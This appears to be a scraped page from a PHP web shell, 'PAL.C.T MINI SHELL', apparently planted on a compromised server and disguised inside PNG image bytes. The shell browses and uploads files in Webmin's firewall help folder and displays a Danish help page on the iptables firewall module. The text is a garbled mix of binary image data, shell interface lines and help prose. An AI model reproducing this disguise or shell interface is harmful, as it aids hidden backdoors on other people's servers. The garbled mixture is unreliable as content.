php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /usr/libexec/webmin/firewall/help/
upload
files >> //usr/libexec/webmin/firewall/help/intro.da.auto.html

<header> Linux Firewall </header><h3> Introduktion til modul </h3> Dette modul giver dig mulighed for at konfigurere IPtables-firewallfunktioner, der findes i 2.4-serien med Linux-kerner. I modsætning til nogle andre firewall-konfigurationsprogrammer, i stedet for at oprette et shell-script, der opsætter firewall, læser og redigerer det en gem-fil i det format, der er læst og skrevet af henholdsvis <tt>ipi (6) -tabeller-gendannelse</tt> og <tt>ipi (6) -tabeller</tt> . <p> Hvis du allerede har en firewall på dit system, der er opsat manuelt eller fra en scriptfil, tilbyder modulet at konvertere den til en IPtables-gemningsfil for dig og oprette et script, der skal køres på starttidspunktet for at aktivere reglerne i filen. Men hvis du gør dette, skal du ikke længere redigere dit firewall-regler script og skulle deaktivere det fra at køre også på starttidspunktet. <p><h3> Oversigt over IPtables </h3> Hver netværkspakke, der kommer ind, går ud fra eller videresendes af dit system, kontrolleres mod en eller flere kæder for at afgøre, hvad der vil ske med det. Hver kæde indeholder nul eller flere regler, som hver har en betingelse (for at bestemme, hvilke pakker den matcher) og en handling (for at kontrollere, hvad der sker med de matchende pakker). Hver kæde har også en standardhandling, der styrer, hvad der sker med pakker, der ikke matcher nogen regel. <p> Hver kæde er en del af et bord, hvoraf der i øjeblikket er tre: <ul><li> <b>Pakkefiltrering ( <tt>filter</tt> )</b> <br> Kæderne i denne tabel kan bruges til at kontrollere data, der kommer ind i dit system fra andre værter på netværket, data, der sendes ud fra dit system af brugere og processer, og data, der videresendes af dit system, hvis det fungerer som en router. <p><li> <b>Oversættelse af netværksadresse ( <tt>nat</tt> )</b> <br> Denne tabel kan bruges til opsætning af NAT eller maskering, hvilket er nyttigt, hvis du vil give et helt netværk af maskiner adgang til internettet gennem kun en rigtig IP-adresse. <p><li> <b>Ændring af <tt>pakker</tt> ( <tt>mangle</tt> )</b> <br> Denne tabel er til at ændre pakker, der er videresendt af eller sendt fra dit system. <p></ul> Ud over de standardkæder, der er en del af hver tabel, kan du også oprette dine egne kæder, der kan køres efter regler i de indbyggede kæder. Dette kan være nyttigt til gruppering og delingsregler, der kan bruges flere steder. <p><h3> Hovedsiden </h3> Hovedsiden i dette modul viser alle kæder og regler fra en af de tilgængelige tabeller valgt fra listen øverst til venstre. Nedenfor er et afsnit for hver kæde i den aktuelle tabel med alle regler i hver kæde anført og deres forhold beskrevet efter modulets evne. For hver kæde kan du ændre standardhandlingen ved hjælp af rullelisten, hvis kæden er en af de indbyggede i tabellen, eller slette den med knappen Slet kæde, hvis den er brugerdefineret. <p> Du kan klikke på en vilkårlig regel i en kæde for at redigere den, klikke på pilene til højre for hver række for at flytte den op eller ned, eller klikke på knappen Tilføj regel for at tilføje en ny. Tilføjelse eller redigering af en regel fører dig til en side, hvor du kan vælge handlingen for hver regel, og de betingelser, som handlingen udføres for. <p> Nederst på siden er der en knap til at aktivere den aktuelle firewall-konfiguration ved at indlæse den i kernen med <tt>ipi (6) -tabeller-gendannelseskommandoen</tt> . Under det er en knap til at gøre det omvendte - tage den konfiguration, der i øjeblikket er i kernen og gøre den tilgængelig til redigering. Endelig, hvis din distribution understøtter det, er der en knap til at ændre, om firewall er aktiveret ved starttidspunktet eller ej. <p><h3> Filtrering af kæder </h3> For bedre samarbejde med eksterne iptables-scripts kan du ekskludere individuelle kæder fra behandlingen med firewall. For at gøre dette skal du vælge direkte behandling af regler i indstillingerne og gå ind i en filterliste, som udelukker de relevante kæder fra behandlingen. Kæder, der ikke er ekskluderet fra redigering, markeres med en &quot;ikke administreret af firewall&quot; -meddelelse. <p><h3> IP-sæt </h3> Nyere versioner af ip (6) -tabel understøtter ipset-udvidelsen. IP-sæt er lister over IP-adresser i hovedhukommelsen, som kan søges meget effektivt og bruges som en betingelse i regler. På hovedsiden vises eksisterende IP-sæt, der kan bruges efter regler. I øjeblikket er det imidlertid ikke muligt at administrere disse i firewall. <p><hr>
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`